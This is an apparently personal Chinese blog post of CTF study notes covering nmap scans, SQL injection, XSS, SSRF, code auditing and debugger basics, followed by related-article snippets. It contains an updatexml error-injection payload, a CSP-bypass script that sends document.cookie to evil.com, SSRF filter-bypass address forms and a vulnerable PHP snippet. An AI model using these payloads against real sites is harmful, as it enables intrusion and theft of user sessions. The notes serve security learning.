sql注入pythonpoco_ctf学习

最新推荐文章于 2023-03-23 13:43:37 发布
最新推荐文章于 2023-03-23 13:43:37 发布
阅读量116 收藏
点赞数
文章标签: sql注入pythonpoco
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42176612/article/details/113543005
版权

CTF学习

Web

nmap

nmap常用的扫描命令是:

nmap -sS -sV-p- 192.168.1.1

nmap -v -T4 -A 192.168.1.1/24

Sql注入

利用报错注入:

updatexml:爆破数据库版本Payload:

?id=1'+updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)%23

常见的注入点位置:

GET参数:最容易发现

POST:通过抓包来发现,Burp或浏览器插件Hackbar发POST包

User-Agent:Burp的Repeater模块或Sqlmap

Cookies:Burp的Repeater模块或Sqlmap

注入的检测;

插入单引号

数字型判断

通过数字的加减判断

XSS跨站脚本攻击

反射型、存储型、DOM型

绕过CSP

大部分网站跳转还是要依赖前端来进行,所以在CSP中无法对location.href做出限制,一次可以衍生出大量的绕过方式:

// bypass 1

// bypass 2

var a=document.createElement("a");

a.href='http://evil.com/cookie.php?cookie='+escape(document.cookie);

document.body.appendChild(a);

a.click();

// bypass 3

服务器请求伪造(SSRF)

示例:

ssrf.php:

$url = $_GET['url'];

echo file_get_contents($url);

?>

当请求:

http://example.com/ssrf.php?url=http://192.168.252.1:8000/

就能够获取到服务器/目录的文件

绕过正则:

http://example.com@evil.com

绕过内网IP地址过滤:

127.0.0.1的替代写法:

八进制:0177.00.00.01

十进制:2130706433

十六进制:0x7f.0x0.0x0.0x1

省略写法: 127.1

或配置域名:

evil.example.com=>10.0.18.3

特性利用

PHP语言特性

Windows系统特性

代码审计

源码泄露

常见备份文件

Github

svn

利用漏洞泄露

代码审计

工具

收费:RIPS,价格不菲,也有开源版,但是有缺点

免费:Seay源代码审计系统,自动审计的过程主要是根据各种正则表达式匹配结果是否存在漏洞

其他:安全狗、D盾、护卫神等Webshell工具扫描

逆向工程

逆向工程是我比较喜欢的方向,之前也做过一些研究,这次学习就细心点吧。

Ollydbg

断点

分类:

一般断点:

int3指令

F2键快速下断点

也可以使用命令行:bp xxxxxx或者bp MessageBoxA

内存断点:

内存访问和内存写入,OD每一时刻只允许一个内存断点

硬件断点:

硬件访问、硬件写入、硬件执行,最多设置4个硬件断点

快捷键

F9:运行程序

F7:单步跟踪(进入),一条条执行,遇到call会进入执行

F8:但不跟踪(步过),遇到call不会进入

F4:执行到所选代码

Alt+F9:执行到程序领空,主要用于在dll或其他调用库时快速回到主程序领空

gdb

在Linux下调试程序必备,默认情况下,Linux都会自动安装,如果没有,手动安装:

sudo apt-get install gdb

sudo apt-get install gdb-multiarch

插件:peda、gef、pwndbg,都可以在github上面找到

IDA Pro

暂时先写到这,工作考研,我哭了-_-

xian zhang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入pythonpoco_Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_39991531的博客
12-11 116
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequestsimportargparseparser=argparse.ArgumentParser()parser.add_argument('-u',dest="url")args=parser.parse_args()url=args.url#存在漏洞的页面url+=...
sql注入pythonpoco_骑士CMS后台SQL注入 | CN-SEC 中文网
weixin_39753213的博客
02-11 187
摘要漏洞文件:admin/admin_feedback.php代码82行:跟下get_report_list:$_GET[‘reporttype’]漏洞文件:admin/admin_feedback.php代码82行:if (!empty($_GET['reporttype'])) { $wheresql=empty($wheres...
sql注入pythonpoco_Dapper和SQL注入
weixin_39951930的博客
12-11 123
Dapper如何幫助防止SQL注入?這使得完全參數化數據訪問變得非常非常容易,無需連接輸入。特別是,因為你並不需要通過大量的“20參數添加參數,設置參數類型,檢查空,因為ADO.NET有蘇茨基空處理 ,沖洗/重複”地跳,通過使參數處理愣神方便。它還使得將行轉換為對像變得非常簡單,避免了使用DataTable的誘惑...每個人都獲勝。來自評論:還有一個......那個小巧玲瓏實際上有什麼幫助呢?回答...
sql注入pythonpoco_十种MySQL报错注入
weixin_39532352的博客
12-11 93
1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2.extractvalue()select * from test where id=1 a...
sql注入pythonpoco_Flask和Django有什么不同和区别?
weixin_39581739的博客
12-11 117
本文概述Django和Flask是Python的网络框架。众所周知, Python是最通用的编程语言, 它提供了广泛的Web框架。 Web开发人员可以选择这些框架。程序员可以灵活地利用全栈Python Web框架。它增强了复杂Web应用程序的开发。 Python还提供了一个选项, 可以选择微型和轻量级的Python Web框架来构建简单的Web应用程序, 而无需花费额外的时间和精力。Django和...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
mysql&&sql注入+ctf+web安全
最新发布
10-08
mysql&&sql注入+ctf+web安全
welcome_CTF.exe
08-07
一道简单的ctf逆向题目,取自于成信大2019四叶草安全杯比赛
hac.zip_CTF信息隐写_ctf
09-23
【标题】"hac.zip_CTF信息隐写_ctf"是一个关于CTF(Capture The...通过这个实验,不仅可以学习到信息隐写的基本技巧,还能锻炼分析问题和解决问题的能力,这对于未来参与更高级别的CTF竞赛或网络安全工作具有重要意义。
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
开源入侵检测系统—Snort检测NMap扫描和SQL注入
negnegil的博客
10-18 6226
前两篇我们完成了对Snort的安装、配置,了解了Snort配置为 IDS 的基本使用 这一篇讲一讲 Snort 如何对 Nmap扫描和 SQL 注入进行检测 检测Nmap扫描 1、NMAP Ping扫描 规则 vim /etc/snort/rules/local.rules ##下面的规则都写入这个文件中 alert icmp any any -> 192.168.43.97 any (msg: "NMAP ping sweep Scan"; dsize:0;sid:10000001; rev: 1
01_渗透靶场NullByte:namp使用,多姿势SQL注入,提权
Hack word
03-23 1040
首先使用nmap进行扫描,发现NullByte靶机地址为192.168.20.14,然后对齐各种端口进行检测,使用默认脚本检测,然后进行目录爆破,根据爆破的结果去访问web页,查看网页源码查看网页上图片的信息,将这个信息进行解析查看文件的具体内容,发现字符串尝试当作密码/路径等一切可以想到的进行访问,跳转到新的界面测试是否存在SQL注入,但是在新的页面当中所存在的是"双引号报错,根据SQL注入的多种姿势进行操作,最终拿到phpmyadmin页面的登录账户和密码,然后进行远程ssh连接,进入后首先查看当前用户
渗透测试相关知识点如sqlmap注入nmap扫描方式sql注入类型sql注入防护方法等
HHH's Blogs
09-03 1882
一,sqlmap,怎么对一个注入点注入? 1)如果是get型号,直接,sqlmap -u "诸如点网址". 2) 如果是post型诸如点,可以sqlmap -u "注入点网址” --data="post的参数" 3)如果是cookie,X-Forwarded-For等,可以访问的时候,用burpsuite抓包,注入处用*号替换,放到文件里,然后sqlmap -r "文件地址" 二,nmap...
实训实训实训
IWANnaaa的博客
04-03 4759
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.1...
SQL注入实验
xiongIT的博客
10-29 2643
SQL注入实验和站在防御者角度该怎么预防Sql注入
利用Nmap对MS-SQLSERVER进行渗透
Fly_鹏程万里
12-17 904
如今Nmap的脚本引擎从一个普通的端口扫描器转变为具有攻击性的渗透测试工具 。随着nmap各种脚本的存在。到目前为止,我们甚至可以进行完整的SQL数据库渗透而不需要任何其他的工具。 在本教程中,我们将看到在这些脚本中有些什么样的信息,以及如何通过Nmap从数据库中提取,还可以利用SQLServer来执行系统命令。 默认MS-SQL数据库上运行的端口为1433,为了及时发现有关数据库,我们需要执...
网络逻辑漏洞、SQLMAP、Nmap、burpsuite及其命令的使用方法
weixin_65695770的博客
04-07 4150
SQLMAP sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 sqlmap支持五种不同的注入模
sql注入绕过方法总结
热门推荐
test
10-10 4万+
前言 sql注入的原因,表面上说是因为拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量;但是更深层次的原因是,数据库将用户输入的字符串,当成了 “sql语句” 来执行。 简而言之:用户输入的数据变成了代码被执行 string sql = "select id,no from user where id=" + id; 我们希望用户输入的 id 的值,仅仅作为一个字符...
Nmap SQL注入扫描插件Http-sql-injection
weixin_30781631的博客
06-25 784
Nmap发布了一个web扫描插件http-sql-injection.nse,可以通过使用HTTP爬虫检测网站中存在的SQL注入点。 地址:https://svn.nmap.org/nmap/scripts/http-sql-injection.nse 转载于:https://www.cnblogs.com/taskiller/archive/2012/06/25/2562807.html...
mysql与SQL注入CTF Web安全探索关键信息库
本文档主要探讨了MySQL与SQL注入在Web安全和CTF(Capture The Flag,网络安全竞赛)中的重要性,结合了对系统库的深入解析以及常用指令的操作。首先,我们来了解一下MySQL的核心组成部分和它们的功能: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值